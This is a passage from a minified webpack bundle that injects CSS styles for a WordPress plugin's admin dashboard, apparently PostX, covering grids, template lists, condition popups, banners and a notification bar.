.ultp-description{font-size:14px}.ultp-description{color:#4a4a4a;font-size:14px}.ultp-description-notice{margin-top:5px;color:#e68429}.ultp-plugin-required{font-size:14px;text-align:center;display:inline-block;padding:20px 0px 0;color:var(--postx-warning-button-color);margin-top:-16px}@media only screen and (max-width: 1200px){.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp_dash_key_features .ultp_dash_key_features_content{grid-template-columns:1fr 1fr 1fr}}@media only screen and (max-width: 1100px){.ultp-dashboard-addons-container .ultp-addons-container-grid{grid-template-columns:auto}.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 768px){.ultp-dashboard-addons-container .ultp-addons-container-grid{grid-template-columns:auto}.addons_promotions.ultp-gs{max-width:100%}.ultp-gettingstart-message{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp_dash_key_features .ultp_dash_key_features_content{grid-template-columns:1fr}}@media only screen and (max-width: 425px){.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(1, 1fr)}}.ultp-addon-group{background:#fff;border-radius:8px;padding:32px}`,""]);const u=c},3038:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-dashboard-blocks-container{display:flex;flex-direction:column;gap:50px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .frequency{margin-bottom:0px !important}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{margin-top:20px;display:grid;gap:30px;grid-template-columns:1fr 1fr 1fr}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item{display:flex;justify-content:space-between;padding:20px 15px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-item-meta{display:flex;gap:10px;align-items:center;font-size:16px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-item-meta img{height:25px;width:25px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option{display:flex;align-items:center;gap:10px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option a{text-decoration:none}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option .ultp-option-tooltip{display:flex;align-items:center;text-decoration:none;gap:3px;font-size:14px;color:#575a5d}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option .ultp-option-tooltip .dashicons{height:unset;width:unset;line-height:unset;font-size:14px;color:#575a5d}@media only screen and (max-width: 1350px){.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 990px){.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{grid-template-columns:1fr}}",""]);const l=i},725:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-builder-dashboard__content{width:100%;margin:0;display:grid;grid-template-columns:200px 1fr}.ultp-builder-dashboard__content .ultp-builder-tab__content{display:flex;flex-direction:column;justify-content:flex-start}.ultp-builder-dashboard__content .ultp-builder-tab__content .ultp-tab__content{height:100%}.ultp-builder-tab__option{background:#edf6ff;border:1px solid rgba(3,127,255,.03);min-height:100vh;border-radius:4px 0 0 4px}.ultp-builder-tab__option ul{padding:0px;margin:0px}.ultp-builder-tab__option ul li{font-size:14px;cursor:pointer;color:#091f36;padding:12px 0px 12px 30px;display:flex;align-items:center;transition:400ms}.ultp-builder-tab__option ul li.active,.ultp-builder-tab__option ul li.active *{color:var(--postx-primary-color);background-color:var(--postx-white-color)}.ultp-builder-tab__option ul li:hover,.ultp-builder-tab__option ul li:hover *{color:var(--postx-primary-color)}.ultp-builder-tab__option ul li img{margin-right:8px;height:20px;text-align:left}.ultp-builder-tab__option ul li span{margin-right:8px;font-size:24px;text-align:left;display:block;line-height:1;height:auto}.ultp-builder-tab__option ul ul li{padding-left:50px}.ultp-builder-tab__option .ultp-popup-sync{font-size:14px;cursor:pointer;display:flex;align-items:center;transition:400ms;padding:12px 0px 12px 30px;margin-bottom:0}.ultp-builder-tab__option .ultp-popup-sync i{margin-right:4px;font-size:25px;height:auto;width:auto}.ultp-builder-tab__option .ultp-popup-sync:hover,.ultp-builder-tab__option .ultp-popup-sync:hover *{color:var(--postx-primary-color)}.ultp-builder-tab__content .ultp-builder-tab__heading{display:flex;align-items:center;justify-content:space-between;padding:0 0 20px 30px;max-height:30px}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title .heading{display:inline-block;font-size:18px;text-transform:capitalize}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title span{margin-right:20px;padding-right:20px;border-right:1px solid #575a5d;font-size:18px;cursor:pointer;color:#575a5d}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title span svg{height:12px;width:14px;color:#575a5d;margin-right:5px}.ultp-builder-tab__content .ultp-tab__content{display:none !important;opacity:0;transition:.3s;padding:30px;background:var(--postx-white-color);border-radius:0 4px 4px 0;box-shadow:0 1px 2px 0 rgba(8,68,129,.2)}.ultp-builder-tab__content .ultp-tab__content.active{display:block !important;opacity:100;transition:.3s}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab{display:flex;flex-direction:column;gap:20px}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper{background:#f6f8fa;padding:15px 20px 15px 20px;border-radius:4px;border:solid 1px #eaedf2}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading{display:flex;align-items:center;flex-wrap:wrap;gap:15px;justify-content:space-between}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta{display:flex;gap:15px;color:#172c41}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta>div{font-size:14px;font-weight:normal;margin:0px !important}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta>div>span{font-weight:600;text-transform:capitalize}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__content div{display:flex;align-items:center;justify-content:space-between}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control{display:flex;gap:12px;position:relative;min-height:26px;align-items:center}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a{text-decoration:none;font-size:13px;color:#575a5d;display:flex;align-items:center;justify-content:center;text-transform:capitalize}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a span{font-size:12px;color:#091f36;height:auto}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a.status{min-width:56px}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-dashboard__action{line-height:1.2;cursor:pointer}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-action__active{position:absolute;top:52px;cursor:pointer;right:-20px;padding:10px 36px;background:#f9f9f9;box-shadow:4px 6px 12px -10px #000;z-index:9999}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-action__active .dashicons{font-size:18px;top:3px;position:relative}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-condition__edit{padding:5px 10px;border-radius:2px;font-size:12px;border:none;color:#fff;cursor:pointer;background-color:#091f36}.ultp-builder-tab__content .ultp-builder-items{display:grid;gap:30px;grid-template-columns:1fr 1fr 1fr}.ultp-builder-tab__content .ultp-builder-items .newScreen{border-radius:4px;border:solid 1px #eaedf2;background-color:#fff}.ultp-builder-tab__content .ultp-builder-items .newScreen .listInfo{padding:8px 12px;border-bottom:solid 1px #eaedf2;text-transform:capitalize;margin-bottom:12px}.ultp-builder-tab__content .ultp-builder-items .newScreen .listInfo .ultp_h6{font-size:16px;font-weight:500}.ultp-builder-tab__content .ultp-builder-items .newScreen .listOverlays{height:250px}.ultp-builder-tab__content .ultp-builder-items .newScreen .listOverlays img{height:100%;object-fit:fill}.premadeScreen .ultp-item-list{border-radius:4px;border:solid 1px #eaedf2;background-color:#fff}.premadeScreen .ultp-item-list .listInfo{padding:10px;display:flex;justify-content:space-between;align-items:center;border-bottom:solid 1px #eaedf2;text-transform:capitalize;flex-wrap:wrap;row-gap:10px}.premadeScreen .ultp-item-list .listInfo .title{font-size:14px;color:#091f36;font-weight:500}.premadeScreen .ultp-item-list .listInfo .title .parent{font-weight:400;font-size:12px;color:rgba(9,31,54,.67)}.premadeScreen .ultp-item-list .listInfo .btnImport{display:flex;align-items:center;border-radius:4px;background-image:linear-gradient(#18dd5c, #0c8d20);padding:5px 10px;color:#fff;font-size:12px}.premadeScreen .ultp-item-list .listInfo .btnImport svg{height:12px;color:#fff;margin-right:6px}.premadeScreen .ultp-item-list .listInfo .btnImport span{color:#fff}.premadeScreen .ultp-item-list .listInfo .ultp-upgrade-pro-btn{font-size:12px;padding:5px 10px}.premadeScreen .ultp-item-list .listOverlay{box-sizing:border-box;position:relative;line-height:0;padding:10px}.premadeScreen .ultp-item-list .listOverlay img{border-radius:4px}.premadeScreen.ultp-builder-items.ultpheader .bg-image-aspect,.premadeScreen.ultp-builder-items.ultpfooter .bg-image-aspect{aspect-ratio:1.8}.premadeScreen.ultp-builder-items.ultpheader .ultp-list-blank-img img,.premadeScreen.ultp-builder-items.ultpfooter .ultp-list-blank-img img{max-height:190px}.premadeScreen.ultp-builder-items.ultpheader .dashicons-visibility,.premadeScreen.ultp-builder-items.ultpfooter .dashicons-visibility{font-size:50px}.ultp-builder-items .ultp-item-list img{width:100%;max-width:100%}.ultp-item-list{position:relative}.ultp-premade-item{transition:.3s}.ultp-premade-item:hover{box-shadow:1px 4px 18px -12px #000}.ultp-list-white-overlay{cursor:pointer;font-weight:600;width:100%;height:100%;justify-content:center;align-items:center;top:0;left:0;position:absolute;display:flex;align-items:center;color:var(--postx-primary-color);font-size:12px}.ultp-list-white-overlay .dashicons{margin-right:15px;font-size:32px;display:block;height:auto;color:var(--postx-primary-color)}.ultp-condition-wrapper{z-index:100000;position:fixed;top:0;left:0;width:100%;height:100%;display:flex;justify-content:center;align-items:center;background:rgba(0,0,0,.7)}.ultp-condition-wrapper .ultp-condition-popup{max-width:700px;width:100%;position:relative;background:#fff;padding:40px 60px;border-radius:4px;height:fit-content;max-height:90%;overflow:unset !important;margin:50px auto 0}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close{position:absolute;top:0;right:-52px;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff;transition:400ms}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close svg{color:#000}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close:hover{background:red}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close:hover svg{color:#fff}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content{display:flex;gap:30px;align-items:center;justify-content:center;flex-wrap:wrap;position:relative}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap{height:450px;width:100%;display:flex;flex-direction:column;align-items:center;overflow-y:scroll !important;-ms-overflow-style:none;scrollbar-width:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap-heading{margin-bottom:14px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap::-webkit-scrollbar{display:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-items{width:600px;margin-top:20px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .btnCondition{margin-top:20px;color:#fff;border-radius:4px;background-color:#091f36;padding:8px 16px;border:none;cursor:pointer}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition_cancel{cursor:pointer;position:absolute;right:-30px;color:#de1010;font-size:24px;line-height:.7;transition:400ms}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition_cancel:hover{color:#c00a0a}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields,.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap__field{display:flex;align-items:center;position:relative;width:100%}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap__field{background:#fff;margin-top:15px;border:1px solid #eaedf2;border-radius:2px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields{padding:0px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields select{color:#575a5d;border:none;margin-right:0;padding-top:7px;padding-bottom:7px;border-right:1px solid #eaedf2;border-radius:0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields select:last-child{border-right:none;width:100%;max-width:100%}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__label{display:inline-flex;align-items:center;background:#7c8084;padding:4px 8px;border-radius:2px;color:#fff}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__label::-webkit-scrollbar{display:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown{text-align:left;width:100%;display:flex;align-items:center;position:relative}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-condition-text{width:100%;display:inline-flex;padding:0 10px 0 10px;align-items:center}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-condition-text .ultp-condition-arrow{font-size:15px;display:inline-block;padding-left:15px;line-height:1.5}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown span{cursor:pointer}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-dropdown-value__close{color:#fff;background:#000;margin-left:8px;border-radius:50%;font-size:14px;line-height:1;height:auto;width:auto}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__default{width:100%;display:block;padding:12px 0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__content{width:100%;display:flex;align-items:center;justify-content:space-between}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__content .ultp-condition-arrow{top:3px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search{background:#fff;position:absolute;left:0;z-index:1;top:39px;width:100%;padding:10px;border-radius:0;box-sizing:border-box;border:1px solid #eaedf2}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search input{width:100%;border-radius:2px;min-height:34px;border:1px solid #eaedf2}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search li{cursor:pointer;text-align:left;margin-bottom:12px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search li:last-child{margin-bottom:0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-save-condition{width:100%;font-size:14px;position:sticky;bottom:0;color:#fff;border-radius:4px;padding:15px;border:none;cursor:pointer;background-image:linear-gradient(#399aff, #016cdb)}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-save-condition span{font-size:17px;margin-left:4px;color:#fff}.ultp-builder-items .ultp-premade-img__blank{height:100%;display:flex;align-items:center;justify-content:center;padding:20px}.ultp-premade-img__blank img{max-height:395px}.ultp-list-blank-img img{opacity:.1}.ultp-list-blank-img a{text-decoration:none !important}@media only screen and (max-width: 1100px){.ultp-builder-dashboard__content{gap:20px;grid-template-columns:auto}.ultp-builder-dashboard__content .ultp-builder-tab__option{min-width:300px;width:fit-content;min-height:fit-content}.ultp-builder-tab__content .ultp-builder-items{grid-template-columns:1fr 1fr}}.ultp-builder-create-btn{text-transform:capitalize}",""]);const l=i},5735:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'@media only screen and (max-width: 1350px){.ultp-menu-items div{margin:0px 10px 0 0}}@media only screen and (max-width: 1250px){.ultp-menu-items div a:after{bottom:-2px;height:2px}}.dash-faq-container{min-width:170px}.dash-faq-container a{text-decoration:none;font-size:14px;color:#575a5d;display:flex;gap:8px;align-items:center;width:-webkit-fill-available;padding-right:32px}.dash-faq-container a:focus{box-shadow:none}.dash-faq-container a .dashicons{padding-top:2px}.dash-faq-container a:hover{color:var(--postx-primary-color)}.dash-faq-container{display:flex;flex-direction:column;gap:15px;padding:25px;position:absolute;right:20px;top:70px;border-radius:2px;box-shadow:0 2px 4px 0 rgba(8,68,129,.2);background-color:#fff;z-index:1}.dash-faq-container::before{content:"";content:"";position:absolute;right:0px;top:-29px;font:normal 42px dashicons;color:#fff}.ultp-dashboard-container-grid{display:grid;grid-template-columns:auto 424px;gap:32px}@media only screen and (max-width: 1250px){.ultp-dashboard-container-grid{display:flex;flex-direction:column}}@media only screen and (max-width: 1250px){.ultp-dashboard-container-grid{display:flex;flex-direction:column}}.ultp-dashboard-container-grid .ultp-dashboard-content{display:flex;gap:32px;flex-direction:column}.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-banner,.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-pro-promo,.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-blocks{padding:32px}.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-item-con{box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863)}.ultp-dash-banner{padding:32px;display:flex;gap:80px;justify-content:space-between}@media screen and (max-width: 758px){.ultp-dash-banner{padding:16px;flex-direction:column-reverse;gap:8px;width:fit-content}}.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-title{font-weight:600;font-size:24px;line-height:32px;color:#070707}@media screen and (max-width: 768px){.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-title{font-size:18px;display:inline-block}}.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-description{max-width:365px;font-size:16px;line-height:24px;color:#41474e;margin-top:14px}.ultp-dash-banner .ultp-dash-banner-left .ultp-primary-alter-button{padding:10px 24px;margin-top:32px}.ultp-dash-banner .ultp-dash-banner-right{width:352px}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img{position:relative}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img img{max-width:100%}@keyframes pulse-border{0%{box-shadow:0 0 0 5px rgba(241,19,108,.6)}70%{box-shadow:0 0 0 15px rgba(255,67,142,0)}100%{box-shadow:0 0 0 5px rgba(255,67,142,0)}}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img .ultp-dash-banner-right-play-button{cursor:pointer;width:64px;height:64px;border-radius:50%;background-color:#fff;display:flex;align-items:center;justify-content:center;position:absolute;top:50%;right:50%;transform:translate(50%, -50%);animation:pulse-border 1.2s ease-in infinite}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img .ultp-dash-banner-right-play-button svg{width:24px;height:24px;color:#070707;margin-top:-1px;margin-left:1px}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-video{width:352px;height:240px;border-radius:8px;overflow:hidden;box-shadow:0px 0px 42.67px 0px rgba(212,212,221,.4784313725)}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-video iframe{width:100%;height:100%}.ultp-dash-pro-promo{padding:32px;background-color:#fff;display:flex;gap:80px;justify-content:space-between}@media only screen and (max-width: 1400px){.ultp-dash-pro-promo{flex-direction:column-reverse;gap:24px}}@media only screen and (max-width: 758px){.ultp-dash-pro-promo{flex-direction:column-reverse;gap:24px;padding:16px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-title{font-weight:600;font-size:24px;line-height:32px;color:#070707}@media only screen and (max-width: 1250px){.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-title{font-size:18px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-description{max-width:365px;font-size:16px;line-height:24px;color:#41474e;margin-top:14px}@media only screen and (max-width: 1250px){.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-description{font-size:14px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-primary-alter-button{margin-top:32px}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature{display:flex;column-gap:24px;row-gap:12px;flex-wrap:wrap;margin-top:24px}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature .ultp-dash-pro-promo-left-keyfeature-item{display:flex;align-items:center;gap:6px;font-weight:500;font-size:14px;line-height:20px;color:#070707}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature .ultp-dash-pro-promo-left-keyfeature-item svg{width:20px;height:20px;color:#1f66ff}.ultp-dash-pro-promo .ultp-dash-pro-promo-right-img{max-width:352px;object-fit:contain}.ultp-dash-blocks{padding:32px}@media only screen and (max-width: 1250px){.ultp-dash-blocks{padding:16px}}.ultp-dash-blocks .ultp-dash-blocks-heading{display:flex;justify-content:space-between;align-items:center;margin-bottom:24px}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-dash-blocks-heading-title{font-weight:600;font-size:18px;line-height:24px;color:#0a0d14}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-transparent-button{color:#1f66ff !important}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-transparent-button svg{fill:#1f66ff !important;width:20px;height:20px}.ultp-dash-blocks .ultp-dash-blocks-items{display:grid;grid-template-columns:1fr 1fr 1fr;gap:16px}@media only screen and (max-width: 1500px){.ultp-dash-blocks .ultp-dash-blocks-items{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 1250px){.ultp-dash-blocks .ultp-dash-blocks-items{grid-template-columns:1fr}}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-dash-blocks-item{display:flex;gap:8px;align-items:center;justify-content:space-between;border:1px solid #e6e6e6;border-radius:8px;background:#fbfbfb;box-shadow:none}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta{display:flex;align-items:center;gap:8px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta .ultp-blocks-item-icon{width:24px;height:24px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta .ultp-blocks-item-title{font-weight:500;font-size:14px;line-height:20px;color:#2e2e2e}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-control-option{display:flex;align-items:center;gap:8px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-control-option .ultp-option-tooltip{font-size:12px;line-height:16px;color:#6e6e6e;text-decoration:none}',""]);const l=i},9455:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-dashboard-general-settings-container{display:grid;grid-template-columns:auto 360px;gap:32px}.ultp-dashboard-general-settings-container .ultp-general-settings{height:fit-content;width:-webkit-fill-available;padding:32px}.ultp-dashboard-general-settings-container .ultp-general-settings form{margin-top:40px}.ultp-dashboard-general-settings-container .ultp-general-settings .skeletonOverflow{display:flex;gap:30px;flex-direction:column;margin-top:40px}.ultp-dashboard-general-settings-container .ultp-general-settings .onloading{cursor:no-drop}.ultp-dashboard-general-settings-container .ultp-general-settings .onloading svg{height:14px;width:14px;vertical-align:middle;margin-left:4px;animation:ultp-spin 1s linear infinite;color:#fff}@media only screen and (max-width: 1100px){.ultp-dashboard-general-settings-container{grid-template-columns:auto;justify-items:center}.ultp-dashboard-general-settings-container .ultp-general-settings-content-right{width:360px}}@media only screen and (max-width: 768px){.ultp-dashboard-general-settings-container .ultp-general-settings-content-right{width:100%}}",""]);const l=i},886:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-setting-hellobar{background:#037fff;padding:6px 0;text-align:center;color:rgba(255,255,255,.85);font-size:14px}.ultp-setting-hellobar a{margin-left:4px;font-weight:700;font-size:14px;color:#fff}.ultp-setting-hellobar strong{color:#fff;font-weight:700}.ultp-ring{-webkit-animation:ring 4s .7s ease-in-out infinite;-moz-animation:ring 4s .7s ease-in-out infinite;animation:ring 4s .7s ease-in-out infinite;margin-right:5px;font-size:20px;position:relative;top:2px;color:#fff}.helobarClose{position:absolute;cursor:pointer;right:15px}.helobarClose svg{height:16px;color:#fff}@keyframes ring{0%{transform:rotate(0)}1%{transform:rotate(30deg)}3%{transform:rotate(-28deg)}5%{transform:rotate(34deg)}7%{transform:rotate(-32deg)}9%{transform:rotate(30deg)}11%{transform:rotate(-28deg)}13%{transform:rotate(26deg)}15%{transform:rotate(-24deg)}17%{transform:rotate(22deg)}19%{transform:rotate(-20deg)}21%{transform:rotate(18deg)}23%{transform:rotate(-16deg)}25%{transform:rotate(14deg)}27%{transform:rotate(-12deg)}29%{transform:rotate(10deg)}31%{transform:rotate(-8deg)}33%{transform:rotate(6deg)}35%{transform:rotate(-4deg)}37%{transform:rotate(2deg)}39%{transform:rotate(-1deg)}41%{transform:rotate(1deg)}43%{transform:rotate(0)}100%{transform:rotate(0)}}",""]);const l=i},283:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp_h1{font-size:var(--postx-h1-fontsize);font-weight:var(--postx-h1-weight)}.ultp_h2{font-size:var(--postx-h2-fontsize);font-weight:var(--postx-h2-weight)}.ultp_h3{font-size:var(--postx-h3-fontsize);font-weight:var(--postx-h3-weight)}.ultp_h4{font-size:var(--postx-h4-fontsize);font-weight:var(--postx-h4-weight)}.ultp_h5{font-size:var(--postx-h5-fontsize);font-weight:var(--postx-h5-weight)}.ultp_h6{font-size:var(--postx-h6-fontsize);font-weight:var(--postx-h6-weight)}.ultp_h1,.ultp_h2,.ultp_h3,.ultp_h4,.ultp_h5,.ultp_h6{color:#091f36}.ultp-settings-container{margin:0 !important;background:#f6f8fa;padding:32px;min-height:100vh;height:100%}.ultp-settings-container .ultp-settings-content .ultp-premade-grid{background:#f6f8fa}@media screen and (max-width: 1250px){.ultp-settings-container{padding:12px}}.ultp-settings-content{margin:0 auto 40px !important;max-width:1376px}@media screen and (max-width: 768px){.ultp-settings-content{max-width:100%;overflow:scroll}}.ultp-dash-item-con{background:#fff;padding:12px;border-radius:8px;box-shadow:0 2px 4px 0 rgba(27,28,29,.0392156863)}.ultp-setting-header{display:grid;align-items:center;grid-template-columns:148px 502px auto 72px;gap:16px;background:var(--postx-white-color);border-bottom:1px solid var(--postx-border-color);padding:0 32px;position:sticky;top:32px;width:100%;height:67px;min-height:67px;box-sizing:border-box;z-index:99}@media screen and (max-width: 1200px){.ultp-setting-header{grid-template-columns:152px auto;background-color:#fff;gap:32px;height:auto;padding-top:12px;column-gap:38px;box-shadow:0px 0px 11px rgba(0,0,0,.168627451)}}@media screen and (max-width: 768px){.ultp-setting-header{display:flex;flex-wrap:wrap;padding:8px;height:auto}}.ultp-setting-hellobar{position:relative;background:#027fff;padding:6px 0;text-align:center;color:rgba(255,255,255,.85);font-size:14px}.ultp-setting-hellobar a{margin-left:4px;font-weight:700;color:#fff}.ultp-setting-hellobar strong{color:#fff}.helobarClose{position:absolute;top:50%;right:15px;transform:translateY(-50%);cursor:pointer}.helobarClose 